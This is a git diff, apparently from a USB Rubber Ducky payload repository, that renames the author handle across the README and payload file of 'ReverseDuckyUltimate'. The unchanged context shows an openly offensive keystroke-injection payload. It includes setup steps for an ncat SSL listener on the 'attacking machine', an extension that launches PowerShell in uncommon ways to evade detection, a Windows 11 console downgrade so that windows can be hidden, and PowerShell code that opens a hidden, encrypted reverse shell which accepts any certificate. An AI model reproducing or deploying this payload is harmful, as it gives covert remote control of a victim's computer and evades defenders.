It will ask for information about the certificate - Insert whatever you want.<br> It will ask for information about the certificate - Insert whatever you want.<br>
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png)
- Second: Start a listener on your attacking machine which supports certificates. - Second: Start a listener on your attacking machine which supports certificates.
Examples: Examples:
@ -31,25 +31,25 @@ ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem
Additionally add an unique identifier to give your Duck a name. Additionally add an unique identifier to give your Duck a name.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png)
- Fourth: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go. - Fourth: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.
## Instruction - Automatic Setup ## Instruction - Automatic Setup
- First: Navigate to `#SETUP` and set its value to `TRUE` and set your desired `#PORT` to the port you want to use. - First: Navigate to `#SETUP` and set its value to `TRUE` and set your desired `#PORT` to the port you want to use.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png)
- Second: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky. Open up an elevated terminal on your attacking machine and instert the Ducky. - Second: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky. Open up an elevated terminal on your attacking machine and instert the Ducky.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png)
- Third: After the automatic setup, a listener should be running on your machine. Now re-enter PayloadStudio, set `#SETUP` to `FALSE`, define your IP-Address, compile the payload and you're good to go! - Third: After the automatic setup, a listener should be running on your machine. Now re-enter PayloadStudio, set `#SETUP` to `FALSE`, define your IP-Address, compile the payload and you're good to go!
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png)
# #
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png)
Credit for DS 3.0 implentation and ideas: Credit for DS 3.0 implentation and ideas:
- Daniel Bohannon - Daniel Bohannon

12
payloads/library/remote_access/ReverseDuckyUltimate/payload.txt
View File

@ -1,7 +1,7 @@
REM ReverseDuckyUltimate REM ReverseDuckyUltimate
REM Version 1.3 REM Version 1.3
REM OS: Windows / Unix REM OS: Windows / Unix
REM Author: 0iphor13 REM Author: 0i41E
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed. REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed.
@ -49,10 +49,10 @@ EXTENSION PASSIVE_WINDOWS_DETECT
END_REM END_REM
END_EXTENSION END_EXTENSION
REM Extension ROLLING_POWERSHELL_EXECUTION by 0iphor13 to obfuscate the start of Powershell REM Extension ROLLING_POWERSHELL_EXECUTION by 0i41E to obfuscate the start of Powershell
EXTENSION ROLLING_POWERSHELL_EXECUTION EXTENSION ROLLING_POWERSHELL_EXECUTION
REM VERSION 1.0 REM VERSION 1.0
REM Author: 0iphor13 REM Author: 0i41E
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum REM Requirements: PayloadStudio v.1.3 minimum
REM Starts Powershell in uncommon ways to avoid basic detection REM Starts Powershell in uncommon ways to avoid basic detection
@ -131,7 +131,7 @@ END_EXTENSION
EXTENSION DETECT_FINISHED EXTENSION DETECT_FINISHED
REM VERSION 1.0 REM VERSION 1.0
REM AUTHOR: 0iphor13 REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION REM_BLOCK DOCUMENTATION
USAGE: USAGE:
@ -164,7 +164,7 @@ END_EXTENSION
EXTENSION WINDOWS11_CONSOLE_DOWNGRADE EXTENSION WINDOWS11_CONSOLE_DOWNGRADE
REM_BLOCK REM_BLOCK
Version: 1.0 Version: 1.0
Author: 0iphor13 Author: 0i41E
Description: Downgrade the default command prompt of Windows 11 to use Conhost again. Description: Downgrade the default command prompt of Windows 11 to use Conhost again.
Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again. Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.
END_REM END_REM
@ -380,7 +380,7 @@ ELSE_DEFINED
Polymorphism2() Polymorphism2()
STRING .GetStream(); STRING .GetStream();
STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])); STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]));
STRING $sSL.AuthenticateAsClient('madeby.0iphor13', $null, "Tls12", $false); STRING $sSL.AuthenticateAsClient('madeby.0i41E', $null, "Tls12", $false);
Polymorphism3() Polymorphism3()
STRING =new-object System.IO.StreamWriter($sSL); STRING =new-object System.IO.StreamWriter($sSL);
STRING $sSL.write( STRING $sSL.write(